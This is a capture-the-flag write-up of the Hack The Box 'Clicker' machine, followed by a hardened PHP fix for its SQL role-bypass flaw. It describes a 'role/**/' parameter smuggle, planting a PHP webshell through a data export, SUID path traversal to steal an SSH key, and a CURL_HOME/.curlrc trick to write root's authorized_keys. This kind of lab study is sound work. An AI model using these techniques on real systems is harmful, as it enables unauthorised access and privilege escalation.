[HTB] Clicker
Last updated
Let's start with the usual nmap scan:
After trying to visit http://10.10.11.232 we are redirected to 'clicker.htb', so let's add it to the hosts file:
Since nfs is running, we can try to see if we can mount the share:
The zip file seems to contain the source code for the website hosted on the same server:
After examining the code, we can see that the save_game.php page can be used to edit some information about the current player by performing a SQL query. However, there seems to be some protection in place to prevent changing the player role.
The request is sent and the game is saved successfully:
For the new role to take effect, we need to log out and log in again.
By examining the admin functionality we can see that the get_top_players function is called, so basically any player with more than 1000000 clicks is shown on the dashboard.
There is also an option to export the dashboard results to a file that is written to the server, and its path is disclosed. Note here that the else condition is used for any other extension, including php, phtml etc.
We can simply store a php webshell in the nickname field so when the table of users with more than 1000000 clicks is exported, the webshell will be included in the content. Note that we also have to set the number of clicks to a value greater than 1000000.
After storing the webshell in the nickname field we can send the export request and choose an arbitrary file extension.
The export file is created successfully and we also get the path and filename.
By navigating to the target file we can use our webshell and achieve RCE.
On my Kali machine I like to run the command shown below. It copies a base64-encoded webshell to the clipboard and also sets up ncat.
After searching around in the filesystem we can see that in the /opt/manage directory there is a SUID binary owned by jack, who is a low-privilege user on the box. First we can transfer this file to Kali for examination to see if there is any way to exploit it.
Using the IDA decompiler we can see that the file accepts some predefined arguments; however, if none of the predefined arguments is provided it falls back to 'default'. In 'default' it issues the same command as in the other cases, but the file is taken from the second argument. Also, since 'system' is used, directory traversal is possible.
We can run the command shown below to read jack's private SSH key and log in as jack to obtain the user flag.
We can see that jack is allowed to run /opt/monitor.sh as root and to set environment variables. Since curl is run, and it is known that it packs A LOT of features, we can look at how to abuse it to obtain root.
From 'man curl' we can see that we can set the 'CURL_HOME' variable which can contain a '.curlrc' file with additional command line options.
We can create the following '.curlrc' file in '/home/jack'. This way the request is intercepted by Burp running on our Kali machine (which means we can alter the response), and the file is saved to the predefined path with root rights. Essentially we have achieved arbitrary file write as root (we could also overwrite the /etc/passwd file and add a new root user).
Make sure that the Burp proxy accepts connections from all interfaces.
Then run the script as root while specifying the 'CURL_HOME' environment variable.
Forward the request, but make sure to choose to intercept the response.
In the response we just add our public key, which is going to be written to root's authorized_keys file.
Then we can simply SSH in as root.
Since the GET parameter name is used directly in the SQL query, we can use the following trick to avoid matching the 'if' condition on line 8 of save_game.php and update our role. By using 'role/**/' the query remains valid and the condition is not triggered. Source: .
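The root cause is that a parameter name reaches the SQL text after a check that only looks for the literal string 'role'. As an added example (not the box's own save_game.php), here is a hardened version of the update handler: column names are matched exactly against an allowlist that does not include 'role', values are validated per field (which also keeps PHP code out of the nickname column that the export later writes to disk), and the query is executed as a prepared statement. It assumes a PDO connection in `$pdo` and a hypothetical session key `$_SESSION['PLAYER']` holding the current username.

```php
<?php
// Added example, not the original save_game.php. Hardened update logic:
// identifiers come only from the allowlist below, never from user input.
const ALLOWED_FIELDS = [
    'clicks'   => 'int',     // 'role' is deliberately absent: it can never be updated here
    'level'    => 'int',
    'nickname' => 'string',
];

function buildUpdate(array $params): array
{
    $sets = [];
    $values = [];
    foreach ($params as $key => $value) {
        // Exact key lookup: 'role/**/' or 'ROLE' is simply not a key of the array.
        if (!array_key_exists($key, ALLOWED_FIELDS)) {
            throw new InvalidArgumentException("Unknown field: $key");
        }
        if (ALLOWED_FIELDS[$key] === 'int') {
            if (!ctype_digit((string) $value)) {
                throw new InvalidArgumentException("Non-numeric value for $key");
            }
            $values[] = (int) $value;
        } else {
            // Nickname restricted to a short alphanumeric token, so no '<?php' can be stored.
            if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', (string) $value)) {
                throw new InvalidArgumentException("Invalid value for $key");
            }
            $values[] = (string) $value;
        }
        $sets[] = "$key = ?";   // $key is a known-good identifier at this point
    }
    if ($sets === []) {
        throw new InvalidArgumentException('No fields to update');
    }
    return ['UPDATE players SET ' . implode(', ', $sets) . ' WHERE username = ?', $values];
}

// Request handling (assumes $pdo is an existing PDO connection).
session_start();
try {
    [$sql, $values] = buildUpdate($_GET);
    $values[] = $_SESSION['PLAYER'];   // hypothetical session key for the logged-in player
    $stmt = $pdo->prepare($sql);
    $stmt->execute($values);
    echo 'Game saved';
} catch (InvalidArgumentException $e) {
    http_response_code(400);
    echo 'Invalid request';
}
```

With this handler a request carrying `role/**/=Admin` fails the `array_key_exists` check and returns 400 before any SQL is built.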